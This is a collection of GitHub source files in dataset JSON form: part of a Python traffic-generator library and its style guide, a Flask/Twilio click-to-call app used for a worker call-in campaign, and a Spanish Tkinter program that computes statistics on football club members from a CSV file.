@abstractmethod\n def get_attributes(self) -> Dict[str, str]:\n \"\"\" Get all attributes values. \"\"\"\n pass\n\n @abstractmethod\n def get_attribute(self, attribute: str) -> str:\n \"\"\"Get single attribute value.\n\n :param attribute: attribute name.\n \"\"\"\n pass\n\n @abstractmethod\n def get_children(self, *types: str) -> List[TgnObject]:\n \"\"\"Get all children of the requested types.\n\n :param types: requested children types.\n \"\"\"\n pass\n\n @abstractmethod\n def get_objects_from_attribute(self, attribute: str) -> List[TgnObject]:\n \"\"\"Read attribute as list of references and return an object for each of them.\n\n For each reference in the attribute, return its object if exists in the objects tree or create new object under\n the self object.\n Return empty list for empty attribute.\n\n :param attribute: attribute containing the object references.\n \"\"\"\n pass\n\n @abstractmethod\n def get_obj_class(self, obj_type: str) -> Type[TgnObject]:\n \"\"\"Returns the object class based on parent and object type.\n\n :param obj_type: requested object type.\n \"\"\"\n pass\n\n\nclass TgnL3(ABC):\n \"\"\" ABC for all L3 objects. \"\"\"\n\n @abstractmethod\n def ip(self):\n \"\"\"\n :return: IP address.\n \"\"\"\n pass\n\n @abstractmethod\n def num_ips(self):\n \"\"\"\n :return: number of IP addresses.\n \"\"\"\n pass\n"
},
{
"alpha_fraction": 0.6888977885246277,
"alphanum_fraction": 0.6952875256538391,
"avg_line_length": 20.973684310913086,
"blob_id": "361e2619dae791e60f62078758b54b64cc5f287e",
"content_id": "2892871ba68dd7116d304d5054bf2993c080b8c1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2504,
"license_type": "permissive",
"max_line_length": 150,
"num_lines": 114,
"path": "/docs/style.md",
"repo_name": "feng891005/PyTrafficGenerator",
"src_encoding": "UTF-8",
"text": "Style Guide\n---\n\nAs we all know, python is very stylish language.\nSo first, we follow [PEP 8](https://www.python.org/dev/peps/pep-0008/) and [PEP 257](https://www.python.org/dev/peps/pep-0257/).\n\nWhere this style guide conflicts with the PEPs - **fix the style guide**.\n\nAnyway, this style guide does not try to invent anything, but select one style where several pythonic options are\navailable.\n\nImports\n=======\nImports should be grouped and ordered, from the general to the specific.\nThere should be a blank line between groups.\n```python\nimport logging\nimport os\n\nimport requests\n\nimport trafficgenerator\n```\nDo not use relative imports.\n\nMethods ordering\n================\nMethods with class should be grouped as following:\n\nFirst, all dundar (operation overloading) starting with __init__.\nThen business logic methods.\nThen properties.\nAnd private methods at the end.\n\n```python\n\nclass MyClass:\n\n def __init__(self):\n pass\n\n def __str__(self):\n pass\n\n def do_something(self):\n pass\n\n def do_something_else(self):\n pass\n\n @property\n def property_1(self):\n pass\n\n @property\n def property_2(self):\n pass\n\n def _private_1(self):\n pass\n\n def _private_2(self):\n pass\n```\n\nStrings and Docstrings\n======================\nUse single quotes ('') for strings and double-quotes (\"\") for docstrings.\n\nThe summary line should be in the the same line as the opening quotes. Add one space between the quotes and the line.\n\nRemove the docstring, this is a standard pytest method name, and you do not need to document it, especially when your docstring does not explain much.\n\nDo not shout, please use only lowercase and try to refrain from using exclamation marks and ellipses.\n\nComments\n========\nThe golden rule for comments is - More is less.\n\nThe code should be self-explanatory and comments should be used only the explain the `WHY` and `WHAT`, the `HOW` should\nbe clear from the code.\n\nTry to limit the comment to one line.\n\nLogger\n======\nLog level matters - please set it carefully.\n\nDo not shout, please use only lowercase and try to refrain from using exclamation marks and ellipses.\n\nLine breaks\n===========\nPlease refrain from using `\\\\`. Break long lines on commas, dots, etc.\n\nType hints\n==========\nAdd type hinting in method definitions.\n\nType hinting in the code itself is optional.\n\nGeneral\n=======\nAlways prefer positive conditions.\n\nRight:\n```python\nif True:\n pass\n```\nWrong:\n```python\nif not False:\n pass\n```"
}
] | 15 |
CoworkerOrg/clicktocall-flask
|
https://github.com/CoworkerOrg/clicktocall-flask
|
536386c502aa40b95f36f5dc8a8c3fc836a68412
|
ecfc66c11da115fcee2677a93d376ab4f2fb16ea
|
d908d820d0480aefaffcf57a55c372cc87a5792c
|
refs/heads/master
| 2020-04-02T00:06:43.567171 | 2018-11-06T16:00:35 | 2018-11-06T16:00:35 | 153,789,482 | 0 | 0 |
MIT
| 2018-10-19T13:46:09 | 2017-06-30T12:46:03 | 2017-11-30T13:16:39 | null |
[
{
"alpha_fraction": 0.7135922312736511,
"alphanum_fraction": 0.7215357422828674,
"avg_line_length": 38.068965911865234,
"blob_id": "2d641eef37e7ca96eeac23f0c5f8e9b109469e25",
"content_id": "ec7377987387b5360b52e56d41b3fa0bdbeb103c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2266,
"license_type": "permissive",
"max_line_length": 388,
"num_lines": 58,
"path": "/README.md",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "# Click to Call with Flask\n\nThis is a fork of an application example implementing Click to Call using Twilio. \n\nAt Coworker.org, we used this to support a worker-led call-in campaign. We hosted it on Heroku, so there are a few Heroku-specific files in this repo that don't exist in the original. We also added a small reporting script, `report.py`, that let us easily see how many calls were made. You can see screenshots in [docs/](https://github.com/CoworkerOrg/clicktocall-flask/blob/master/docs).\n\n\n\n## Local development\n\nThis project is built using the [Flask](http://flask.pocoo.org/) web framework. It runs on Python 2.7+ and Python 3.4+.\n\nTo run the app locally, first clone this repository and `cd` into its directory. Then:\n\n1. Create a new virtual environment:\n - If using vanilla [virtualenv](https://virtualenv.pypa.io/en/latest/):\n\n ```\n virtualenv venv\n source venv/bin/activate\n ```\n\n - If using [virtualenvwrapper](https://virtualenvwrapper.readthedocs.org/en/latest/):\n\n ```\n mkvirtualenv clicktocall-flask\n ```\n\n1. Install the requirements:\n\n ```\n pip install -r requirements.txt\n ```\n\n1. Copy the `.env.example` file to `.env`, and edit it including your credentials for the Twilio API (found at https://www.twilio.com/user/account/settings). You will also need a [Twilio Number](https://www.twilio.com/user/account/phone-numbers/incoming).\n1. Run `source .env` to apply the environment variables\n1. Expose your application to the wider internet using ngrok. You can click [here](#expose-the-application-to-the-wider-internet) for more details. This step is important because the application won't work as expected if you run it through localhost.\n\n ```bash\n $ ngrok http 5000\n ```\n\n1. Start the development server:\n\n ```\n make run\n ```\n\nOnce Ngrok is running, open up your browser and go to your Ngrok URL. It will\nlook like this: `http://9a159ccf.ngrok.io`\n\nThat's it!\n\n## Meta\n\n* No warranty expressed or implied. Software is as is. Diggity.\n* [MIT License](http://www.opensource.org/licenses/mit-license.html)\n* Lovingly crafted by Twilio Developer Education.\n"
},
{
"alpha_fraction": 0.7359550595283508,
"alphanum_fraction": 0.7359550595283508,
"avg_line_length": 24.428571701049805,
"blob_id": "0bef35762be9e315bd96cf61ad074cd46c9f77bd",
"content_id": "d18e9d70322c3cf2bc1f03b09903668a4a2630cc",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 178,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 7,
"path": "/clicktocall/static/js/scripts.js",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "function activate() {\n document.getElementById(\"modal\").classList.add(\"is-active\")\n}\n\nfunction deactivate() {\n document.getElementById(\"modal\").classList.remove(\"is-active\")\n}\n"
},
{
"alpha_fraction": 0.4615384638309479,
"alphanum_fraction": 0.6769230961799622,
"avg_line_length": 15.25,
"blob_id": "b55c03b213d56e7201d50ea29e3f70bca0f3d5ea",
"content_id": "225bc3270f042820779762183fc7da1218111679",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 65,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "Flask==0.12.2\nFlask-SSLify==0.1.5\ntwilio==6.9.0\ngunicorn==19.6.0\n"
},
{
"alpha_fraction": 0.6082417368888855,
"alphanum_fraction": 0.6148351430892944,
"avg_line_length": 29.33333396911621,
"blob_id": "1581b67bccc7f13328e38debeb7c3ccacece5074",
"content_id": "df114c2f51aad2d4fde4c34dc952cb9d3d8bf5f5",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1820,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 60,
"path": "/clicktocall/app.py",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "from flask import Flask\nfrom flask import jsonify\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom flask_sslify import SSLify\n\nfrom twilio.twiml.voice_response import VoiceResponse\nfrom twilio.rest import Client\n\n# Declare and configure application\napp = Flask(__name__, static_url_path='/static')\nsslify = SSLify(app)\napp.config.from_pyfile('local_settings.py')\n\n# Route for Click to Call demo page.\[email protected]('/')\ndef index():\n return render_template('index.html',\n configuration_error=None)\n\[email protected]('/data-use')\ndef data_use():\n return render_template('data-use.html',\n configuration_error=None)\n\n# Voice Request URL\[email protected]('/call', methods=['POST'])\ndef call():\n # Get phone number that was submitted in the form\n phone_number = request.form.get('phoneNumber', None)\n\n try:\n twilio_client = Client(app.config['TWILIO_ACCOUNT_SID'],\n app.config['TWILIO_AUTH_TOKEN'])\n except Exception as e:\n msg = 'Missing configuration variable: {0}'.format(e)\n return jsonify({'error': msg})\n\n try:\n twilio_client.calls.create(from_=app.config['TWILIO_CALLER_ID'],\n to=phone_number,\n url=url_for('.outbound',\n _external=True))\n except Exception as e:\n app.logger.error(e)\n return jsonify({'error': str(e)})\n\n return jsonify({'message': 'Call incoming!'})\n\n\[email protected]('/outbound', methods=['POST'])\ndef outbound():\n script = \"We're connecting you right now.\"\n dial_to = \"+15555555555\"\n\n response = VoiceResponse()\n response.say(script, voice='alice')\n response.dial(dial_to)\n return str(response)\n"
},
{
"alpha_fraction": 0.663551390171051,
"alphanum_fraction": 0.6696261763572693,
"avg_line_length": 34.065574645996094,
"blob_id": "921cf86fbc18060931bb13df86a57b3ec0cc9ee1",
"content_id": "71d8e927e8df3c10389fbec3d4f9cc1ba5c45f44",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2140,
"license_type": "permissive",
"max_line_length": 157,
"num_lines": 61,
"path": "/report.py",
"repo_name": "CoworkerOrg/clicktocall-flask",
"src_encoding": "UTF-8",
"text": "import argparse\nfrom datetime import datetime\nfrom twilio.twiml.voice_response import VoiceResponse\nfrom twilio.rest import Client\n\nfrom app import app\n\nparser = argparse.ArgumentParser(description='Report on Twilio stats for call-in app')\nparser.add_argument('sdate', \n nargs=3,\n type=int,\n help='Campaign start date in the format M D YYYY, where M D and Y are integers')\nparser.add_argument('edate', \n nargs=3,\n type=int,\n help='Campaign end date in the format M D YYYY, where M D and Y are integers')\nparser.add_argument('--duration', \n type=int, \n help='Minimum duration, in seconds. Used to count how many calls were longer than the amount provided. Defaults to 10.')\nparser.add_argument('--delete',\n action='store_true',\n help='Deletes all call records for the time frame provided. ***No further reports can be run on the data set after running the program with this flag.***')\nargs = parser.parse_args()\n\ntry:\n twilio_client = Client(app.config['TWILIO_ACCOUNT_SID'],\n app.config['TWILIO_AUTH_TOKEN'])\nexcept Exception as e:\n msg = 'Missing configuration variable: {0}'.format(e)\n print(jsonify({'error': msg}))\n\nstart = datetime(args.sdate[2], args.sdate[0], args.sdate[1])\nend = datetime(args.edate[2], args.edate[0], args.edate[1])\ncalls_list = twilio_client.calls.list(\n start_time_after=start,\n start_time_before=end,\n status='completed')\n \ndef count_calls(call_length=10):\n total_calls = []\n actual_calls = []\n \n if args.duration:\n call_length = args.duration\n for call in calls_list:\n # print(call.direction)\n if call.direction == 'outbound-dial':\n total_calls.append(call)\n if int(call.duration) > call_length:\n actual_calls.append(int(call.duration))\n print('Total completed calls between', str(start), ' and ', str(end), ': ', len(total_calls))\n print('Calls longer than ', call_length, ' seconds: ', len(actual_calls))\n\ndef delete_calls():\n if args.delete:\n print('Deleting all calls...')\n for call in calls_list:\n call.delete()\n\ncount_calls()\ndelete_calls()\n\n"
}
] | 5 |
GstnC/Challenge-Recursiva
|
https://github.com/GstnC/Challenge-Recursiva
|
13a0b9e80e447a804fa803ce38dab0bdd982f65b
|
a50f4eb9c4359d14f596858b7ce7320676193aa5
|
1745f1e2d379a51815050fc917ba450842368ebe
|
refs/heads/main
| 2023-08-15T17:49:00.858180 | 2021-10-06T14:18:56 | 2021-10-06T14:18:56 | 414,230,474 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5716080665588379,
"alphanum_fraction": 0.572864294052124,
"avg_line_length": 25.10344886779785,
"blob_id": "55b0371d56493f1c4a895d086e8a3b43cde66883",
"content_id": "088e5c63614eda1857ba1659fa2d2ca703578fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 29,
"path": "/SociosCls.py",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "class SociosCls:\r\n def __init__(self,nombre,edad,equipo,estCivil,estudios):\r\n self.__nombre = nombre\r\n self.__edad = edad\r\n self.__equipo = equipo\r\n self.__estCivil = estCivil\r\n self.__estudios = estudios\r\n pass\r\n\r\n def getNombre(self):\r\n return self.__nombre\r\n \r\n def getEdad(self):\r\n return self.__edad\r\n\r\n def getEquipo(self):\r\n return self.__equipo\r\n\r\n def getEstCivil(self):\r\n return self.__estCivil\r\n \r\n def getEstudios(self):\r\n return self.__estudios\r\n\r\n def esCasadoUniversitario(self):\r\n return self.getEstCivil() == \"Casado\" and self.getEstudios() == \"Universitario\"\r\n\r\n def punto3Model(self):\r\n return (self.getNombre(),self.getEdad(),self.getEquipo())\r\n \r\n "
},
{
"alpha_fraction": 0.8243243098258972,
"alphanum_fraction": 0.8310810923576355,
"avg_line_length": 73,
"blob_id": "2ba6617f0d549deff9f2559c0ecc48ff952756ed",
"content_id": "e3605630b15a22f749362b17b9150f30156f6db9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 298,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 4,
"path": "/README.md",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "# Challenge-Recursiva\nUn pequeño programa desarrollado en Python 3.9 que desarrolla las tareas especificadas en el Challenge Superliga de Recursiva\n\nSimplemente ejecute main.py desde una terminal o en cualquier editor de código y seleccione el archivo .csv correspondiente a los socios a tratar.\n"
},
{
"alpha_fraction": 0.6197666525840759,
"alphanum_fraction": 0.631091296672821,
"avg_line_length": 30.377777099609375,
"blob_id": "40a53923def6cdf6ca0271b998d01cc20738d2ec",
"content_id": "47360f8297bab00ffcedea173b95e04e4b939333",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2915,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 90,
"path": "/main.py",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nfrom operator import itemgetter\r\nfrom SociosCls import SociosCls\r\nfrom GUI import GUI\r\n\r\n\r\n\r\ndef main():\r\n global listSocios\r\n global listIndSocios\r\n listSocios = []\r\n listIndSocios = []\r\n \r\n dictCB = {\r\n \"resetSocios\":resetSocios,\r\n \"addSocio\":addSocio,\r\n \"genIndexList\":genIndexList,\r\n \"punto1\":punto1,\r\n \"punto2\":punto2,\r\n \"punto3\":punto3,\r\n \"punto4\":punto4,\r\n \"punto5\":punto5\r\n }\r\n\r\n app = GUI(dictCB)\r\n pass\r\n\r\ndef resetSocios():\r\n global listSocios\r\n listSocios = []\r\n\r\ndef addSocio(nombre,edad,equipo,estCivil,estudios):\r\n listSocios.append(SociosCls(nombre,edad,equipo,estCivil,estudios))\r\n\r\ndef genIndexList():\r\n global listIndSocios\r\n listIndSocios = range(len(listSocios)) \r\n\r\ndef punto1():\r\n return \"La cantidad total de personas registradas es: \" + str(len(listSocios))\r\n\r\ndef punto2():\r\n listRacing = list( filter(lambda ind:(listSocios[ind]).getEquipo()==\"Racing\",listIndSocios) )\r\n cantSocios = len(listRacing)\r\n if cantSocios != 0:\r\n listEdades = list( map(lambda ind:(listSocios[ind]).getEdad(),listRacing) )\r\n prom = (sum(listEdades)*1.0)/cantSocios\r\n return \"El promedio de edad en los hinchas de Racing es de \" + str(round(prom)) + \" años\"\r\n else:\r\n return \"No hay hinchas de Racing registrados.\"\r\n\r\ndef punto3():\r\n listCasados = list ( filter(lambda ind:(listSocios[ind]).esCasadoUniversitario(),listIndSocios) ) [0:100]\r\n if len(listCasados) != 0:\r\n listCasados = sorted(listCasados,key=keyEdad)\r\n return list( map(lambda ind:(listSocios[ind]).punto3Model(),listCasados) )\r\n else:\r\n return [] \r\n \r\ndef keyEdad(ind):\r\n return listSocios[ind].getEdad()\r\n \r\ndef punto4():\r\n listRiver = list ( filter(lambda ind:listSocios[ind].getEquipo()==\"River\",listIndSocios) )\r\n dictNombres = {}\r\n for ind in listRiver:\r\n nombre = listSocios[ind].getNombre()\r\n dictNombres[nombre]= dictNombres.get(nombre,0) + 1\r\n listFreq = sorted(dictNombres.items(),key=itemgetter(1),reverse=True)\r\n return listFreq[0:5]\r\n\r\ndef punto5():\r\n dictEquipos = {}\r\n for Socio in listSocios:\r\n equipo = Socio.getEquipo()\r\n dictEquipos[equipo] = dictEquipos.get(equipo,0)+1\r\n listFreq = sorted(dictEquipos.items(),key=itemgetter(1),reverse=True)\r\n listResponse = []\r\n for i in range(len(listFreq)):\r\n equipo,cantSocios = listFreq[i]\r\n listSociosDelEquipo = list( filter(lambda ind:listSocios[ind].getEquipo()==equipo,listIndSocios) )\r\n listEdades = list( map(lambda ind:listSocios[ind].getEdad(),listSociosDelEquipo) )\r\n edadMax = max(listEdades)\r\n edadMin = min(listEdades)\r\n listResponse.append((equipo,cantSocios,edadMax,edadMin))\r\n return listResponse\r\n\r\nif __name__ == '__main__':\r\n main()\r\n"
},
{
"alpha_fraction": 0.5626714825630188,
"alphanum_fraction": 0.5815252661705017,
"avg_line_length": 40.46398162841797,
"blob_id": "edae9de29928bd88d9b3a9b5ac3340af92ec7fab",
"content_id": "4e4ff670245bd7cf668d127cbf0070eb07e9785d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20062,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 472,
"path": "/GUI.py",
"repo_name": "GstnC/Challenge-Recursiva",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nimport io\r\nimport tkinter as tk\r\nfrom tkinter import ttk, filedialog, messagebox\r\n\r\nclass GUI():\r\n def __init__(self, dictCB):\r\n self.callbacks = dictCB\r\n self.root = tk.Tk()\r\n\r\n self.bgLightYellow = \"#E6E8D7\"\r\n self.dataSociosPunto3 = []\r\n self.dataSociosPunto4 = []\r\n self.dataSociosPunto5 = []\r\n\r\n #Configuración Inicial\r\n self.initialConfig()\r\n self.welcomeFrame()\r\n self.loadFrame()\r\n self.punto1Frame()\r\n self.punto2Frame()\r\n self.punto3Frame()\r\n self.punto4Frame()\r\n self.punto5Frame()\r\n \r\n self.root.mainloop()\r\n pass\r\n\r\n def initialConfig(self):\r\n self.root.title(\"Challenge Recursiva - Carrasco Gastón\")\r\n\r\n self.minH = int(self.root.winfo_screenheight() * 0.3)\r\n self.minW = int(self.root.winfo_screenwidth() * 0.3)\r\n \r\n self.minH = max(310,self.minH)\r\n self.minW = max(575,self.minW)\r\n\r\n self.root.resizable(0,0)\r\n self.root.geometry(\"%ix%i+0+0\"%(self.minW,self.minH))\r\n self.root.config(\r\n height=self.minH,width=self.minW\r\n )\r\n self.mainFrame = tk.Frame(self.root)\r\n self.mainFrame.config(\r\n background= self.bgLightYellow\r\n )\r\n self.mainFrame.pack(side='top',fill='both',expand=True)\r\n\r\n self.tkPath = tk.StringVar()\r\n\r\n def welcomeFrame(self):\r\n self.welcomeBaseFrame = tk.Frame(self.mainFrame)\r\n self.welcomeBaseFrame.config(background=self.bgLightYellow)\r\n self.welcomeBaseFrame.pack(side='top',fill='x',ipadx=2)\r\n\r\n self.lblWelcome = tk.Label(self.welcomeBaseFrame)\r\n self.lblWelcome.config(\r\n text=\"Bienvenido! Este programa esta desarrollado para el Challenge - Superliga. \\nSimplemente seleccione el archivo de socios correspondiente y obtenga los resultados pedidos.\",\r\n background=self.bgLightYellow,\r\n anchor='w'\r\n )\r\n self.lblWelcome.pack(side='top',ipadx=2,pady=(5,1))\r\n\r\n def loadFrame(self):\r\n self.loadBaseFrame = tk.Frame(self.mainFrame)\r\n self.loadBaseFrame.config(background=self.bgLightYellow)\r\n self.loadBaseFrame.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.loadLabel = tk.Label(self.loadBaseFrame)\r\n self.loadLabel.config(\r\n text=\"Seleccione el archivo:\",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.loadLabel.pack(side='left',padx=(8,3))\r\n\r\n self.loadButton = tk.Button(self.loadBaseFrame)\r\n self.loadButton.config(\r\n text=\"Buscar\", command=self.selectFile\r\n )\r\n self.loadButton.pack(side='right',padx=(5,8),ipadx=1,ipady=1)\r\n \r\n self.loadEntryFile = tk.Entry(self.loadBaseFrame)\r\n self.loadEntryFile.config(\r\n textvariable=self.tkPath,\r\n state='disabled',\r\n background='white'\r\n )\r\n self.loadEntryFile.pack(side='left',fill='x',expand=True)\r\n\r\n\r\n def punto1Frame(self):\r\n self.punto1FrameBase = tk.Frame(self.mainFrame)\r\n self.punto1FrameBase.config(background=self.bgLightYellow)\r\n self.punto1FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto1Title = tk.Label(self.punto1FrameBase)\r\n self.punto1Title.config(\r\n text=\"Punto 1: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto1Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto1 = tk.Label(self.punto1FrameBase)\r\n self.lblResponsePunto1.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto1.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto2Frame(self):\r\n self.punto2FrameBase = tk.Frame(self.mainFrame)\r\n self.punto2FrameBase.config(background=self.bgLightYellow)\r\n self.punto2FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto2Title = tk.Label(self.punto2FrameBase)\r\n self.punto2Title.config(\r\n text=\"Punto 2: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto2Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto2 = tk.Label(self.punto2FrameBase)\r\n self.lblResponsePunto2.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto2.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto3Frame(self):\r\n self.punto3FrameBase = tk.Frame(self.mainFrame)\r\n self.punto3FrameBase.config(background=self.bgLightYellow)\r\n self.punto3FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto3Title = tk.Label(self.punto3FrameBase)\r\n self.punto3Title.config(\r\n text=\"Punto 3: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto3Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto3 = tk.Label(self.punto3FrameBase)\r\n self.lblResponsePunto3.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto3.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto4Frame(self):\r\n self.punto4FrameBase = tk.Frame(self.mainFrame)\r\n self.punto4FrameBase.config(background=self.bgLightYellow)\r\n self.punto4FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto4Title = tk.Label(self.punto4FrameBase)\r\n self.punto4Title.config(\r\n text=\"Punto 4: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto4Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto4 = tk.Label(self.punto4FrameBase)\r\n self.lblResponsePunto4.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto4.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def punto5Frame(self):\r\n self.punto5FrameBase = tk.Frame(self.mainFrame)\r\n self.punto5FrameBase.config(background=self.bgLightYellow)\r\n self.punto5FrameBase.pack(side='top',fill='x',ipady=10,ipadx=2)\r\n\r\n self.punto5Title = tk.Label(self.punto5FrameBase)\r\n self.punto5Title.config(\r\n text=\"Punto 5: \",\r\n anchor=\"e\", background=self.bgLightYellow\r\n )\r\n self.punto5Title.pack(side='left',padx=(8,3))\r\n\r\n self.lblResponsePunto5 = tk.Label(self.punto5FrameBase)\r\n self.lblResponsePunto5.config(\r\n text=\"Sin respuesta. No se ha cargado ningún archivo aún.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto5.pack(side='left',padx=(4,3),fill='x')\r\n\r\n def selectFile(self):\r\n path = filedialog.askopenfilename(\r\n title=\"Seleccionar archivo de socios\",\r\n filetypes=((\"csv\",\"*.csv\"),(\"Todos los archivos\",\"*.*\"))\r\n )\r\n if path != \"\":\r\n print(\"Path: \" + path)\r\n if not path.endswith(\".csv\"):\r\n ext = path.split('.')[-1]\r\n messagebox.showerror(\r\n message=\"Error, la extensión del archivo no puede ser %s\"%(ext),\r\n title=\"Error de lectura\"\r\n )\r\n else:\r\n self.callbacks[\"resetSocios\"]()\r\n fileSocio = io.open(path,'r',encoding='cp1252')\r\n readingError = False\r\n \r\n line = fileSocio.readline()\r\n line = line.replace('\\r','').replace('\\n','')\r\n if line == \"\":\r\n readingError = True\r\n messagebox.showerror(\r\n message=\"Error, el archivo esta vacio.\",\r\n title=\"Error de lectura\"\r\n )\r\n\r\n try:\r\n while (line!=\"\"):\r\n nombre,edad,equipo,estCivil,estudios = line.split(';')\r\n\r\n #generar nuevo Socio\r\n self.callbacks[\"addSocio\"](nombre,int(edad),equipo,estCivil,estudios)\r\n \r\n line = fileSocio.readline()\r\n line = line.replace('\\r','').replace('\\n','')\r\n except Exception as e:\r\n print(e)\r\n messagebox.showerror(\r\n message=\"Error, el formato del archivo no es el esperado.\",\r\n title=\"Error de lectura\"\r\n )\r\n readingError = True\r\n if not readingError:\r\n self.tkPath.set(path)\r\n self.callbacks[\"genIndexList\"]()\r\n self.executePunto1()\r\n self.executePunto2()\r\n self.executePunto3()\r\n self.executePunto4()\r\n self.executePunto5()\r\n else:\r\n pass\r\n\r\n #Ejecucion Pto1\r\n def executePunto1(self):\r\n response = self.callbacks[\"punto1\"]()\r\n self.lblResponsePunto1.config(text=response)\r\n self.lblResponsePunto1.update()\r\n #Ejecucion Pto2\r\n def executePunto2(self):\r\n response = self.callbacks[\"punto2\"]()\r\n self.lblResponsePunto2.config(text=response)\r\n self.lblResponsePunto2.update()\r\n #Ejecucion Pto3\r\n def executePunto3(self):\r\n response = self.callbacks[\"punto3\"]()\r\n self.dataSociosPunto3 = response\r\n if response == []:\r\n self.punto3EmptyResponse()\r\n else:\r\n self.punto3LoadResponse()\r\n \r\n def punto3EmptyResponse(self):\r\n if hasattr(self,\"btnResponsePunto3\"):\r\n self.btnResponsePunto3.pack_forget()\r\n self.btnResponsePunto3.destroy()\r\n del self.btnResponsePunto3\r\n if not hasattr(self,\"lblResponsePunto3\"):\r\n self.lblResponsePunto3 = tk.Label(self.punto3FrameBase)\r\n self.lblResponsePunto3.config(\r\n text=\"No hay socios registrados que cumplan los requisitos.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto3.pack(side='left',padx=(4,3),fill='x')\r\n else:\r\n self.lblResponsePunto3.config(text=\"No hay socios registrados que cumplan los requisitos.\")\r\n self.lblResponsePunto3.update()\r\n\r\n def punto3LoadResponse(self):\r\n if hasattr(self,\"lblResponsePunto3\"):\r\n self.lblResponsePunto3.pack_forget()\r\n self.lblResponsePunto3.destroy()\r\n del self.lblResponsePunto3\r\n if not hasattr(self,\"btnResponsePunto3\"):\r\n self.btnResponsePunto3 = tk.Button(self.punto3FrameBase)\r\n self.btnResponsePunto3.config(\r\n text=\"Ver respuesta\", command=self.showResponsePunto3\r\n )\r\n self.btnResponsePunto3.pack(side='left',padx=(4,3))\r\n \r\n def showResponsePunto3(self):\r\n if hasattr(self,\"topFramePto3\"):\r\n self.topFramePto3.focus()\r\n else:\r\n xInit = int(self.root.winfo_rootx()) + int(self.root.winfo_width()*0.25)\r\n yInit = int(self.root.winfo_rooty()) + int(self.root.winfo_height()*0.25)\r\n\r\n self.topFramePto3 = tk.Toplevel(self.root)\r\n self.topFramePto3.title(\"Socios casados, universitarios y ordenados por edad.\")\r\n self.topFramePto3.geometry(\"450x270+%i+%i\"%(xInit,yInit))\r\n btnFrame = ttk.Frame(self.topFramePto3)\r\n btnFrame.pack(side='bottom',fill='x')\r\n btnOK = ttk.Button(btnFrame)\r\n btnOK.config(text=\"Aceptar\",command=self.destroyTopPto3)\r\n 